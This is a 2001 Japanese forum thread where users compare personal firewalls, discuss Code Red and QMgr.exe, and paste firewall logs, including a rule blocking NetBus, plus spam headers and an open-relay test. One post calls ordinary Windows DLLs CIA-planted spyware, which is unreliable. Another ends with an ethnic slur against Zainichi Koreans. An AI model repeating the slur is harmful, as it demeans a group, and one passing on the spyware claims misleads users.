昨日、ぞぬを導入した者ですがまだ一度も警告を受けていません。変でしょうか?
Secure Designでチェックしたところ、「大丈夫だ」というような結果でしたが。
488名無しさん@お腹いっぱい。:2001/08/17(金) 10:08
やれやれ
素晴らしい議論が展開しているな(w
ファイアーオールって意味知ってる?
頼むから『火のオールだよ。』なんて言うなよ。ボート漕ぐわけじゃないんだからサ。
少しは勉強してきてね
『全部火』って意味だよ。
489名無しさん@お腹いっぱい。:2001/08/17(金) 10:42
>>488
何を言いたいんだかよくわからんが??
490名無しさん@お腹いっぱい。:2001/08/17(金) 12:22
>>488
厨房はだまっとれ!
491 :2001/08/17(金) 12:31
>>488
ぢゃ〜パーソナルファイアーオールは、
火だるま焼身自殺って意味??
492名無しさん@お腹いっぱい。:2001/08/17(金) 13:22
フレッツADSLにして2週間が経ちました
最近windowsを終了する度に、ログインしてるユーザーがいます
windowsを終了しますか?と言われます
悪いなと思いながらも終了させてしまっています
波が高くなって、もう昼過ぎですが海に行ってきます
493名無しさん@お腹いっぱい。:2001/08/17(金) 13:37
>>492
あなたのパソコンは教会みたいですね。
ジャンバルジャンが来たら銀の皿を持たせてやってくださいね。
494名無しさん@お腹いっぱい。:2001/08/17(金) 16:35
結局フリーで初心者にお勧めのヤツって何ですか?
過去レスで「ここ読め」って所がNotFoundだったので。。。
495名無しさん@お腹いっぱい。:2001/08/17(金) 16:38
ないです。
496名無しさん@お腹いっぱい。:2001/08/17(金) 17:17
>>495
ないんだ。
497n:2001/08/17(金) 19:53
>>494
TinyにしとけYO
498あはあは:2001/08/17(金) 20:11
>>494 自分で作れ!
499名無しさん@お腹いっぱい。:2001/08/17(金) 22:58
>>494
ZoneAlarmがいいと思われ。日本語化パッチもあるし、導入も簡単。
500名無しさん@お腹いっぱい。:2001/08/17(金) 23:09
おーい結局どうなんだー。>>494 じゃないけど。
なんかTinyは「初心者には設定がムズい」って印象が
あるなー。過去スレにもあったような気がする。
501名無しさん@お腹いっぱい。:2001/08/17(金) 23:15
最初はZoneでいいんじゃないの。
俺はZone→Tiny→SygateでTinyに落ち着いたけど
502名無しさん@お腹いっぱい。:2001/08/17(金) 23:32
Tinyだとイリア使う設定がわかんないんだけど
503とりあえず○と×で:2001/08/17(金) 23:55
Zone Sygate Tiny Outpost
簡単に設定 ○ ○ × ×
細かい設定 × × ○ ○
日本語化 ○ × ○ ○
機能の豊富さ × × × ○
安心感(安定感)× ○ ○ ×
軽さ × × ○ ×

一番お薦めしないのがZone。
簡単に設定したい人は、zone使うよりもログの充実したsygate使いなさい。
日本語化は出来ないが、大した英語じゃないから大丈夫。
高機能なのが欲しければ、Outpostにしなさい
ただし、多少の重さと不安定さには耐えなければならない
貧弱なマシンの人はTinyが一番いいでしょう。安定感も抜群
504名無しさん@お腹いっぱい。:2001/08/17(金) 23:57
Sygateに細かい設定ができない?Tinyと同じだと思うけど
505名無しさん@お腹いっぱい。:2001/08/18(土) 00:14
>>504
すいません。間違いです。
506名無しさん@お腹いっぱい。:2001/08/18(土) 05:23
Zoneは、日本語化もできるし
UIもグラフィカルだったりするんで、
ぱっと見、とっつきやすいかもね。

検索しても、たくさんの
日本語サイトがヒットするから、
設定も何とかなりそうだし。

でも、個人的に薦めるのはTinyかな。
俺の環境では、すごく安定してるし、
特別重たいなって感じもない。
(Win2000SP2・IE5.01SP2・PIII 1G・128M)
507名無しさん@お腹いっぱい。:2001/08/18(土) 11:37
>>503
ログの充実って言うけど、そんなにみんなログチェックしてるの?
俺は最初の数日ぐらいしか見なかったけど
508名無しさん@お腹いっぱい。:2001/08/18(土) 16:53
ログチェック?1日に2回ぐらいするよ。21、25、53、80、110、111、515、
8080あたりとか、トロイ狙いのポートスキャンなんてのは完全無視
だけど、たまにトラフィックログに???って感じのパケットが飛んで
来てたりするから、取りっぱなしにしてあるパケットログ見てチェックする。

頻繁に来るパケットなら、PacMonProとかで捕まえるんだけど、
そうそうパケットダンプ取りっぱなしにはできないし。
509名無しさん@お腹いっぱい。:2001/08/19(日) 01:22
>>506
あなたの半分+@しかCPUはないけど(メモリは同じ)、俺もWin2KSP2+IE5.01SP2+Tinyで死ぬほど安定してるし軽い。

PersonalFirewallは大体使ってみたけど、安定してるのはTinyとSygateだと思う。
Sygateはちょっと重めなので、結局俺もTiny

Outpostは・・・・・最近のはどうですか? >使ってる人
一ヶ月ほど前まで使ってたんだけど、ちょっと不安定すぎて使うのあきらめた。
一日に何回か落ちてました、OSごと。

けど、パケットになんか興味が湧いてきたので、Sygateをもう一度使おうかな
510名無しさん@お腹いっぱい。:2001/08/19(日) 01:23
バックドアのみつけ方教えてください
511名無しさん@お腹いっぱい。:2001/08/19(日) 01:46
おれなんかつい最近までMMX166だったんですが。それでもTinyは軽い。
今はK6-2 400、96MRAM、Win95だけどやっぱりTiny以外は重い・・・
512名無しさん@お腹いっぱい。:2001/08/19(日) 21:44
The firewall has blocked Internet access to your computer (ICMP Time Exceeded) from 210.155.132.157.

Occurred: 40 times between 01/08/19 21:16:56 and 01/08/19 21:34:50

ゾーンアラームから以上のようなメッセージがでると同じに異常に重くなったのだが・・・
どういうことだろう
>>512
ICMP Time Exceededの意味を調べてみてね。
210.155.132.157って恐らくルータかゲートウェイですよね。
恐らくその辺りでルーティングがループしています。
今日zone入れたんだが10分に一度は引っかかる。
今までウイルスバスターを信用してきた自分がいやになった。
ところで質問なんですが、ウイルスバスターのファイアーウォールはonでいいんですか?
515名無しさん@お腹いっぱい。:2001/08/20(月) 19:24
これってどう?
http://www.mrflux.com/english/
516名無しさん@お腹いっぱい。:2001/08/20(月) 19:51
>>514
そんなの、捨ててしまえYO!!
517名無しさん@お腹いっぱい。:2001/08/20(月) 20:17
不正進入よりも、水没の心配がでてきた。
518名無しさん@お腹いっぱい。:2001/08/20(月) 21:51
>>515
勧告勢
519名無しさん@お腹いっぱい。:2001/08/20(月) 23:57
>>517
ワラタよ・・・・・・・・・ってシャレにならんじゃねぇーーかーーー
520名無しさん@お腹いっぱい。:2001/08/21(火) 00:06
>>517
土嚢を積め。
つーか、2chに繋げてる場合じゃないだろ(藁
521名無しさん@お腹いっぱい。:2001/08/21(火) 00:23
>>517
ほら、早くパソコン持って脱出しないと(w
522名無しさん@お腹いっぱい。:2001/08/21(火) 02:17
>>522 水没してまで2chを見ていたい君の根性に乾杯!
523522の気持ちを想像してみた:2001/08/21(火) 02:29
自分で自分を誉めてあげたいです(涙
524名無しさん@お腹いっぱい。:2001/08/21(火) 02:33
>>514
カプセルに入ってるなんか気色悪。客には勧めない。
525522:2001/08/21(火) 09:46
>>523 自分に誤爆してしまった…水没して氏のう(ワラ
526名無しさん@お腹いっぱい。:2001/08/21(火) 19:31
ふぁいあうぉーるで、水はふせげますか?
なまえみると、だいじょうぶみたいですけど。
527名無しさん@お腹いっぱい。:2001/08/22(水) 03:02
アサーリ消し飛んじゃいます。

コロッケ買って高台に避難しましょう。
528名無しさん@お腹いっぱい。:2001/08/22(水) 17:32
速報板住人・・・(w
529名無しさん@お腹いっぱい。:2001/08/22(水) 23:08
ファイアーウォールがあるならウォーターウォールがあってもいいはずだ!
ただし中洲にとり残された場合、無効になる。
530 :2001/08/22(水) 23:21
>>529
DMZで、かえって良いじゃん(w
531名無しさん@お腹いっぱい。:2001/08/23(木) 12:50
MSNメッセンジャー入れてから
「QMgr.exe」がネットにアクセスするんですけど、
コイツって一体何者?情報求む。
532名無しさん@お腹いっぱい。:2001/08/23(木) 14:20
>>531
私も同じです。ある日(最近)メッセンジャーをアップロードしたら、
スタートアップ項目にqmgr.exeが参加してる。
そこで、チェックをはずして、qmgr.exeをクリックするとインターネットに接続
しようとします。これはスパイウェアですか?
コイツって一体何者?情報求む。尚、>>531と私は別人間です。
533天才ハッカー様:2001/08/23(木) 14:35
漏れのセキュリティは完璧だぜ。
おまえらのは所詮、厨房のクズセキュリティだ。

俺のとこへ、ウィルス送ってこいよ。
全部、弾き飛ばしてやるぜ!!

ケヘヘヘヘヘヘ!
534名無しさん@お腹いっぱい。:2001/08/23(木) 14:52
>>533
ウイルスがほしいのならそういえば言いんだ
ちなみに  http://natto.2ch.net/test/read.cgi?bbs=pcqa&key=997485641&st=235&to=235&nofirst=true
これは彼の発言
535名無しさん@お腹いっぱい。:2001/08/24(金) 12:00
>>531-532
気になる。
MSNメッセンジャーを入れてからっていうのは確かですか?
536ゴレンジャー:2001/08/24(金) 14:00
>>535
本当です。メッセンジャーってアップデートするか聞いてくるじゃん。
で、何時からだったか定かじゃないんだが、最近アップデートしたとたん
Qmgr.exeが走るようになったよ。
名前から機能推測すると、MSN 宛てに届いたメールのポーリング行って
いるだけだと思うし、そう信じたいのだが。
ほら、タスクトレイからポップアップするでしょ。あの機能が分離されたん
でないかい。
>>532
メールの有無をポーリングするんで、インタネに接続しようとするんでしょう。
まあ、M$だからスパイウエアかも知れませんし。
家に帰ってtcpdumpでパケット覗いてみようかなあ。
537名無しさん@お腹いっぱい。:2001/08/24(金) 14:03
>>531-532 マイクロソフトかMSNに連絡して見たほうがいいと思います。MSNメッセンジャーは使ったことないので。
538名無しさん@お腹いっぱい。:2001/08/24(金) 14:48
英語圏の掲示板でウィルスがどーたらこーたらって話題の中に
Qmgr.exeっていうのが出てきてた。
ただそこの人達も「Qmgr.exeってなんだ!?」ってかんじの
雰囲気だったので、かなりあいまいな情報。すまん。

気になるので
>>536
>家に帰ってtcpdumpでパケット覗いてみようかなあ。
この結果報告きぼーん。
539ゴレンジャー:2001/08/24(金) 15:12
>>538
Qmgr.exeのパケット覗いてみます。
540名無しさん@お腹いっぱい。:2001/08/24(金) 15:19
>>539
まさかとは思うけど無事を祈ります。
541名無しさん@お腹いっぱい。:2001/08/24(金) 16:05
「2chからのポート80への接続のみブロック」という設定のできる
パーソナルファイアウォールはありますか?
542名無しさん@お腹いっぱい。:2001/08/24(金) 17:55
あります。
543名無しさん@お腹いっぱい。:2001/08/24(金) 23:36
製品名を教えてください。
544よく分からんが:2001/08/24(金) 23:53
>>543
Tinyとかで、2chの鯖を全部指定して、それに対して80を塞いどけばいいんじゃないだろうか?
でも、ちょっと面倒くさいかも
545名無しさん@お腹いっぱい。:2001/08/25(土) 00:17
>>43にはTinyではソースアドレスの指定はできないと書いてあるのです
が…できるのでしょうか?
って落として試せばいいか。
546名無しさん@お腹いっぱい。:2001/08/25(土) 00:21
今は両方とも信頼するアドレスを指定できるよ
547: 543@偉そうに買いてゴメソ:2001/08/25(土) 00:23
>>545
ソースアドレスって何?(汗
548名無しさん@お腹いっぱい。:2001/08/25(土) 00:43
>>541
2chって、、、パッチ当ててないIISだったのか!?
>>547
送信元アドレス
549名無しさん@お腹いっぱい。:2001/08/25(土) 00:46
>>548
いや、不正PROXY対策
550名無しさん@お腹いっぱい。:2001/08/25(土) 08:55
>>541
「2chの利用ユーザすべてからのアクセスのみ禁止」って言いたいのだろうか。
それは技術的には無理なんですケド・・・
551_P:2001/08/25(土) 16:38
WINMX動かしていたら、やたら落とされるのでもしやと思いノートンインターネットセキュリティ
を買ってきましたが、WINMXに対しての設定が良くわかりません。(自動で良いのかな?)
警告が出たので、OKをしてしまったのですが・・?
552_P:2001/08/25(土) 16:39
補足
回線は腐れNTTのADSLですね、モデム直結ですわ
553_P:2001/08/25(土) 16:40
補足
オーエスはウィンドウズMEですね
それから、MXは2.6Jです。
554名無しさん@お腹いっぱい。:2001/08/25(土) 16:46
んで今のところなんか問題あるの
555_P:2001/08/25(土) 17:04
あ、そうそう自動でやってるんですが、これで本当に大丈夫なのかということです。
MXのインストール時はFW使わないということでインストールしましたのでポート0の設定には
なっていません。んで特に主導でMXのポートを開けたわけでもないのですが、警告が出ます
内容は80のポートへ接続要求が来ていますがつなげる?って聞いてきます。
ちなみにその時netstatコマンドで覗いたらpop3としてノートンアンチウイルスがいるだけです。
もちろん80のポートへの接続は許可するつもりはありませんが・・・・
相手によりキューを受け付けない場合もあるので、気になっています。
というわけ・・よろしくお願いします。
556_P:2001/08/25(土) 17:16
それと、MX動かして転送中にして寝ていると翌朝おきたらPCの電源が切れているというか、強制終了状態にある
事が多いです。これって攻撃うけているのかな?
557名無しさん@お腹いっぱい。:2001/08/25(土) 17:51
(゚Д゚)ハァ?
558_P:2001/08/25(土) 17:55
(゚Д゚)ハァ? なんだけどよ・・・(゚Д゚)ハァ? なんで
質問しているんですよ。
559名無しさん@お腹いっぱい。:2001/08/25(土) 18:25
>>555
PCとソフトの相性が悪い。よって回避不能
------------------------解決----------------------------
560終了:2001/08/25(土) 19:08
>>558
最近の厨房は本当にキレヤスイ(藁
561ついでに:2001/08/25(土) 19:56
2chも終了
562名無しさん@お腹いっぱい。:2001/08/25(土) 21:01
>>550
違います。不正PROXY対策ですってば
563名無しさん@お腹いっぱい。:2001/08/26(日) 02:46
>>555
>netstatコマンドで覗いたらpop3としてノートンアンチウイルスがいるだけです。
ならば、塞ぐまでもなく、ポート80にパケットがいくらきても廃棄されるよ。
パーソナルファイヤウォールもルータも不要。

>もちろん80のポートへの接続は許可するつもりはありませんが・・・・
のような心配は無用。

>相手によりキューを受け付けない場合もあるので、気になっています。
これ、意味がよくわからないんだけど、何ですか?
565名無しのエリー:01/08/29 20:47 ID:j8G5.QK2
セキュリティの面で
基本的にモデムの設定はスタートアップガイドに書かれてる通りに設定
しておけば大丈夫なんですか?それともここは変えておかなければいけない
部分とかあるのでしょうか?
またNAT機能とはどういったものなのでしょうか?
これは設定したほうがいいのでしょうか?
566名無しさん@お腹いっぱい。:01/08/30 01:29 ID:DOanGo6Q
私生活を地球規模に拡大する機能。
567名無しさん@お腹いっぱい。:01/08/31 00:17 ID:gezlYNVk
>>539
(;゚Д゚)ノゴレンジャー!
なんともなかったのかな?>Qmgr.exe
568名無しさん@お腹いっぱい。:01/09/04 07:08 ID:c5qoJYIM
age
569名無しさん@お腹いっぱい。:01/09/04 12:43 ID:3rzeLkcw
>>556
MXはずっと動かしてるとCPUもリソースもガンガン食うから。
マシンが非力なのかQがたまりすぎてるか。

メモリ開放の常駐ソフトでも入れとけ。
570 :01/09/04 15:09 ID:sf1i/On.
最近警告がめっきり減った
なんか気持ちわりいな
571名無しさん@お腹いっぱい。:01/09/04 17:16 ID:uX2MGTzA
今ネットに繋いで15分ほどの間に警告出っぱなし。
もう30回近いが、何かあったのか?
572名無しさん@お腹いっぱい。:01/09/04 21:18 ID:GGAUDOM.
>>570
減ったね、ここ一週間くらいの間に
その前までは、一日300ほど来てたような気がするけど
コードレッドはホントに迷惑だ。
感染していることに気付かない馬鹿はホント死んで欲しい。
httpにやたらとアクセスしてくるのはこいつのせいだろ。

同じプロバイダーにこういうバカがいるとどうしようもない。
プロバイダーも警告しろよな。近辺のIPに向けてアクセスしてくるんだから。
コードレッドってゾヌアラートで防げる?
漏れ、Win2kだから心配で・・・。
575:01/09/09 11:37
>574
つうかさ、IISさえ動いてなけりゃ平気なんじゃないの?
と思ってまだパッチも当ててないよ?やばいかな?
でもIISって、ソフトに紛れて入ってることも
あるんだって?ったく、トロイかよ!(三村
そういう場合も含めて、IISが動いてるかどうかの確認て
管理ツールのサービスと、タスクマネージャとで見るだけで良いの?
コードレッド2はIISとは無関係じゃなかった?
577576:01/09/10 22:48
悪い。勘違いしてた。
578  :01/09/16 16:38
age
579名無しさん@お腹いっぱい。:01/09/17 23:13
今日、インターネットセキュリティを入れたんですけど、30分に一回ぐらい
の頻度でリモートシステムが接続を確立しようとしていますという警告がでるん
ですけどこれはどういうことでしょうか?脅威レベルは高危険度と表示されます。
どなたかアドバイスして下さい。
580名無しさん@お腹いっぱい。:01/09/17 23:26
警告の内容で、
「C:\WINDOWS\SYSTEM\WUCRTUPD.EXEが接続を試みようとしています。」
のようなものはでますか?
>>579
詳細を言うべし。
多分それはCodeREDじゃないのか?
漏れも捕捉プログラム作って仕掛けていたら捕まる捕まる。
2時間で20匹だよ。まったく。
582名無しさん@お腹いっぱい。:01/09/18 02:36
age
583泥屋:01/09/21 22:52
最近カーソルが瞬間移動したり突然ブラウザが起動したり。ファイル
が共有設定になってたりするんですけど、backdoorかなんかでしょうか?
スレ違いかもしれませんが・・・
>>583
変な動作があったときに、netstat -a で空いてるポートを調べてみろ。
585名無しさん@お腹いっぱい。:01/09/23 22:48
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000911947
だれかここの1の質問答えてやってくれ
ほっとけ
587名無しさん@お腹いっぱい。:01/09/24 04:07
ゾーンアラームをインストールしようとしたら英文だった。
どうすればいい?
>>586
氏ね
>>587
英国紳士になりきる
>>589
  ハハハ
  ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ( ^∀^)<  あほか この低脳が
 ( つ ⊂ ) \_________
  .)  ) )
 (__)_)     (^∀^)ゲラゲラ ゲラゲラ シネヤザイニチ
>>590
何だ、その低脳レスは・・・。
最近厨房少ないだけに急に出てくると浮くよね
593対策済:01/09/24 13:59
594対策済:01/09/24 14:04
From: [email protected]

Subject:Lucky Cherry Casino Newsletter
Date :21 Sep 2001 10:55:20 -0000
Received: from [216.191.167.10] by hotmail.com (3.2) with ESMTP id MHotMail*****; Fri, 21 Sep 2001 **:**:** -0700
Received: (qmail 31693 invoked by uid 0); 21 Sep 2001 10:55:20 -0000
From
[email protected]
Fri, 21 Sep 2001 09:44:17 -0700
Message-ID: < [email protected] >

From : [email protected]
To : [email protected]
Subject: Take a look at this and tell me what you think
Date :Wed, 19 Sep 2001 22:00:38
MIME-Version: 1.0
Received: from [211.23.7.178] by hotmail.com (3.2) with ESMTP id MHotMail*****; Wed, 19 Sep 2001 **:**:** -0700
Received: from html (slip-32-102-47-238.tx.us.prserv.net [32.102.47.238])by www.nakama.com.tw (Postfix) with SMTPid E3B05FB9CA; Thu, 20 Sep 2001 12:07:46 +0800 (CST)
From [email protected] Wed, 19 Sep 2001 20:01:07 -0700
Message-Id: < [email protected] >

From : [email protected]
To : < [email protected] >
Subject :Special Promotion Viagra (6) 50mg. doses FREE Consultation $104.99 ORDER NOW!
Date :Thu, 19 Jul 2001 21:21:18 -0400
MIME-Version: 1.0
Received: from [209.11.18.235] by hotmail.com (3.2) with ESMTP id MHotMail*****; Thu, 20 Sep 2001 **:**:** -0700
Received: from 12.64.204.77 ([12.64.204.77]) by iis2-nyc.kikko.com with Microsoft SMTPSVC(5.0.2195.2966); Wed, 19 Sep 2001 22:17:12 -0400
From [email protected] Thu, 20 Sep 2001 19:37:57 -0700
X-Priority: 3
X-MSMail-Priority: Normal
Errors-To: [email protected]
Return-Path: [email protected]
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
Message-ID: < [email protected] >
X-OriginalArrivalTime: 20 Sep 2001 02:17:14.0830 (UTC)
595名無しさん@お腹いっぱい。:01/09/30 02:52
>>1-3
596Microsoft QMgr:01/10/01 20:15
Microsoft QMgrが、いつも(PC内部から)外へアクセスしようとするのですが、これは、どういう役割を果たしているんでしょうか?

QMgrというものが、JAVA関連らしいというのはなんとか調べたんですがそれ以上はわからないので、ご存知の方教えて下さいませ。

ゾーンアラーム入れて以来、何となく気分が悪いので、全て不許可にしているんですけれど。。。
597名無しさん@お腹いっぱい。:01/10/01 20:18
qmgrってなんだろうね?
俺は気持ち悪いから削除しちゃったけど。
全角の「qmgr」もキモチワルイ
キューマネージャ
MSNメッセンジャー入れたら一緒に入ったような気がする。
それ以前はZoneが接続を検出したこともなかったし。
601Microsoft QMgr:01/10/02 04:15
みなさまどうも有り難う。。。

そか、消しちゃっても良いんですね、消そっと。。。

MSNめっせんじゃー、入れてます。でもメッセンジャーと別にアクセスしようとするのが鬱陶しい。
でもこのフォルダ、色が薄いんですよね(属性H)。。。なんにしろ気分が悪い<MSのあほたれ
602名無しさん@お腹いっぱい。:01/10/02 08:00
freeなら重さは Tiny<Sygate<Zone ですよね?
free以外も試した方、全て含めての重さを教えてもらえないでしょうか?
軽さ
Tiny>>>Sygate>>>>>>>>(中略)>>>>>>>>>Zone>(≒)Norton
定説。
黒氷は知らん、あきらかに使えないVBなども除く。
結局初心者はZone、なれたらTiny or Sygateってことで他のは不要。
>>603
Outpostも使った事の無い奴が偉そうに言うな
>>604
だから定説っていってんじゃんよ。農豚も使った事無いし。
どこが偉そうなんだか。
ちなみに入れてみた事はあるよ。ネタにね。不具合が多すぎて
すぐTinyに戻したけど。故初心者にOutpostなぞ薦める理由が無いから除いてますが何か。
606名無しさん@お腹いっぱい。:01/10/04 11:32
英語苦手な人は

金無い人
ゾーナラーム+無料ウィルス
金あるなら
ノートンセット
でいいですか?
607使ってやってくれ!:01/10/04 20:43
From : [email protected]
Reply-To : [email protected]
To : [email protected]
Subject : Low Cost Merchant Accounts [rytzw]
Date : Wed, 3 Oct 2001 ****

Received: from [199.217.206.66] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: (from daemon@localhost)by gatekeeper.strata-group.com (8.8.7/8.8.7) id TAA18406;Wed, 3 Oct 2001 19:11:13 -0500 (CDT)(envelope-from [email protected])
Received: from triton.strata-group.com(131.124.0.4) by gatekeeper.strata-group.com via smap (V1.3)id sma018387; Wed Oct 3 19:10:45 2001
Received: from ntserver.strata-group.com ([131.124.0.5])by triton.strata-group.com (8.8.5/8.8.5) with ESMTP id SAA00591;Wed, 3 Oct 2001 18:48:52 -0500 (CDT)
Received: from sudve.msn.com (dac.dac-group.com [208.28.136.3]) by ntserver.strata-group.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)id TRZSJXYK; Wed, 3 Oct 2001 18:26:40 -0500
From [email protected] Wed, 03 Oct 2001 17:12:56 -0700
Message-Id: <[email protected]>
X-Mailer: Microsoft Outlook Express 5.50.4522.1200

ntserver.strata-group.com
<<< 220 ntserver.strata-group.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2653.13) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
>>> RCPT TO:<[email protected]>
<<< 250 OK - Recipient <[email protected]>
>>> QUIT
<<< 221 closing connection

問題あり:不正な中継を受け付けます。
(199.217.206.68)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。
608名無しさん@お腹いっぱい。:01/10/05 00:51
ノートンのファイヤウォール2001をインストールしたんですが
これはWINMXでも有効になってるんでしょうか?
暗黙のブロック規則って何…
610名無しさん@お腹いっぱい。:01/10/08 19:13
Sygateイイ!!
黒氷から乗り換えます
mail2.pyramidweb.com

From : [email protected]
Reply-To : [email protected]
To : [email protected]
Subject:Merge bills into 1 monthly payment! [dg58t]
Date:Sat, 6 Oct ***** MIME-Version: 1.0
Received: from [204.142.79.55] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: from [email protected] ([216.12.96.66]) by [email protected]
(Lotus Domino Release 5.0.3) with SMTP id 2001100623372968:909 ; Sat, 6 Oct 2001 23:37:29 -0400
From [email protected] Sun, 07 Oct 2001 02:01:13 -0700
X-Mailer: WEBmail 2.70
X-MIMETrack: Itemize by SMTP Server on Pyramid03/Pyramid Consulting Services(Release 5.0.3 |March 21, 2000)
at 10/06/2001 11:37:30 PM,Serialize by Router on Pyramid01/Pyramid Consulting Services(Release 5.0.6a |January 17, 2001)
at 10/07/2001 05:16:40 AM,Serialize complete at 10/07/2001 05:16:40 AM
Message-ID: <OF4D3671E5.320E549B-ON85256ADE.0013E9A7@LocalDomain>
既出かもしれんけど、outpost日本語対応してますね。
ってか、outpost開発者に日本語化パッチ造った人が送ったみたいだけど。
613名無しさん@お腹いっぱい。:01/10/09 20:21
SygateかOutpost使ってる方、使用感はいかがですか?
Zoneは重いので、どっちかに乗り換えようと思ってます。
ただ、いかんせん情報が少なくて。
「Firewallと森遊びの部屋」にはひととおり目を通しましたが、
重さはどうか、安定度はどうか、などはいまひとつ書かれてませんでした。
614名無しさん@お腹いっぱい。:01/10/09 22:47
.
adimage.dll
advert.dll
advpack.dll
amcis.dll
amcis2.dll
amcompat.tlb
amstream.dll
anadsc.ocx
anadscb.ocx
htmdeng.exe
ipcclient.dll
msipcsv.exe
tfde.dll

ある安全保障局系のサイトにアクセスしてから、
不正アクセスが増えたのです。
変に思い調べたら、
こんなファイルを植え付けられました。
スパイウエアらしいのですがウイルスバスターは認識せず、
手動で削除しました。
CIA系のHPは危険みたいです。
615名無しさん@お腹いっぱい。:01/10/09 23:39
>>613
OutpostはAutoUpdateしないと不安定なので注意。
AutoUpadeでCurrent Buildにバージョンアップすればかなり安定する。
心配するほど重くはない。ZoneAlarmよりは軽いと思うな。
多機能なわりに設定もそこそこ簡単で日本語で使えるから、俺は悪くないと思う。

>>614
それはあるサイトにアクセスしたのは関係ないんじゃない?
FlashGetとか使ってない?
スパイウェアはウイルスじゃないんだから、ウイルスバスターとかノートンでは検出しないよ。
ま、当然だけど。
616名無しさん@お腹いっぱい。:01/10/10 16:39
FireWall-1 の 4.0DES と 4.1strong があるんですけど、
SP って最後のやつだけあてればいいのですか?
617名無しさん@お腹いっぱい。:01/10/10 17:23
世の中進歩したな・・・

dllを植え付けられるサイトが存在するのか。
規則「Default Block NetBus Trojan」が 211.46.246.194,NetBus をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは 211.46.246.194,NetBus
リモートアドレス、 サービスは 61.74.176.235,2093
プロセス名は N/A
620NAME OVER:01/10/13 09:05
ガイシュツならスマソ。
ゾネ入れて2ch掲示板に書き込みしたら必ず8回、2chサーバからアタック受けるんですけど・・

ちなみに64.71.158.82 = choco.2ch.net 218.123.***.** = 漏れのIP

FWIN,2001/10/13,08:52:04 +9:00 GMT,64.71.158.82:8605,218.123.***.**:80,TCP (flags:S)
FWIN,2001/10/13,08:52:11 +9:00 GMT,64.71.158.82:8608,218.123.***.**:8080,TCP (flags:S)
FWIN,2001/10/13,08:52:18 +9:00 GMT,64.71.158.82:8609,218.123.***.**:3120,TCP (flags:S)
FWIN,2001/10/13,08:52:25 +9:00 GMT,64.71.158.82:8612,218.123.***.**:3128,TCP (flags:S)
FWIN,2001/10/13,08:52:32 +9:00 GMT,64.71.158.82:8613,218.123.***.**:8000,TCP (flags:S)
FWIN,2001/10/13,08:52:39 +9:00 GMT,64.71.158.82:8614,218.123.***.**:81,TCP (flags:S)
FWIN,2001/10/13,08:52:46 +9:00 GMT,64.71.158.82:8615,218.123.***.**:8081,TCP (flags:S)
FWIN,2001/10/13,08:52:53 +9:00 GMT,64.71.158.82:8616,218.123.***.**:1080,TCP (flags:S)

と、ちょっと大袈裟にかいてみたり(藁
621名無し募集中。。。:01/10/13 12:16
>>620
串チェックじゃないの?
622名無しさん@お腹いっぱい。:01/10/13 17:05
VBやぞぬって、スタートアップに入れてないのに起動させると勝手に常駐するよね?
あれって解除する方法ないの?
>622
ぞぬは「スタートアップに登録」ってチェックがあるよ。
「設定」の中。
常駐を解除したいなら、タスクバーのゾヌを右クリックして終了させればいい。
624名無しさん@お腹いっぱい。:01/10/13 18:08
ぞぬを使ってるんですが、ライセンス登録ってしたほうがいいんですか?
英語わかんないんでうが・・・
625名無しさん@お腹いっぱい。:01/10/13 18:32
>624
>>2の日本語化パッチはあてた?
626名無しさん@お腹いっぱい。:01/10/13 20:10
>>625
ぞヌじたいはパッチ当ててるんでナントカ使えてるんですが
ライセンス登録って何ですか?
627名無しさん@お腹いっぱい。:01/10/13 20:23
金払う。
628名無しさん@お腹いっぱい。:01/10/13 20:50
>>627
ふ^^^^^^^ん
629622:01/10/14 01:33
>>623
あ、ホントだ(w
ぞぬに関しては俺が見落としてた、スマソ・・・。

VBに関しては、相変わらずスタートアップにも入れてないのに勝手に常駐してしまうんだけど、
誰か知ってる人いたらこれの解決法教えて・・・。
630ひよこ名無しさん:01/10/14 02:35
>>629
ファイル名を指定して実行
msconfig
スタートアップ
チェックを外す

だと思う
>>629
スタートアップって、スタートアップフォルダのこと言ってる?
Win9x系ならmsconfigしてみれ
632622:01/10/14 03:39
>>630 631
(・∀・)!
そこのスタートアップからpccguide.exeってやつのチェック外したら起動時の常駐を解除できました。
どうもありがとう!
633名無しさん@お腹いっぱい。:01/10/14 11:01
自分もFWソフトを入れてみようと思い
最近ZoneAlarmを導入したのですがひとつ困ったことが・・・。
自分のサイトのデータをミラーリングダウンロードするとき
lock.fileのような0バイトのファイルが全然落ちてこないのです。
(実際は落ちてるようなのですがFTPクライアントが終了を確認できないようです)
最初は使ってるFFFTPが原因かと色々設定を変えてみたりしたのですが
結局ZoneAlarmを切ってみたらうまくDLできました。
これってほかのかたでも起きるようなトラブルですか?
ちょっと確認したかったので質問させていただきました。
634613:01/10/14 19:23
>>613です。
ZoneからまずTinyに乗り換えてみましたが、私にはちょっと敷居が高く感じました。
わからないまま設定して穴だらけになってもまずいと思い、結局Outpostを入れることに。
インストール時に「Tiny入れてんのかぞゴルア 消さねーとどうなっても知らねーぞゴルア」って
言われたので、この時点でTinyとはサイナラしてしまいました。

>>615さんのおっしゃる通り、けっこう安定しています(Win2kだからかもしれませんが)。
設定もラクチン、特に重さも気になりません。

おまけ(?)の広告カット機能もイイ感じです。
URLによるブロックとサイズによるブロックを併用してるんですね。
「468*60の画像は表示しない」とか。デフォルトで88*31を切られたのは
ちょっと困りましたが、まぁ問題ないレベルです。

というわけで、Outpost、オススメです。
635名無しさん@お腹いっぱい。:01/10/14 21:46
BBテクノロジーからやけにアタックされてるよ。
これってYBBのユーザーだよね?
636a:01/10/15 04:30
複数のファイアーウォールを同時に使う必要性。
ファイアーウォールも自社のサーバーに勝手にアクセスするので念のために複数
のファイアーウォールをインストールする必要があります。私はBlackICE, Syg
ate Personal Firewall, Zone Alarm Proを入れています。Sygate Personal
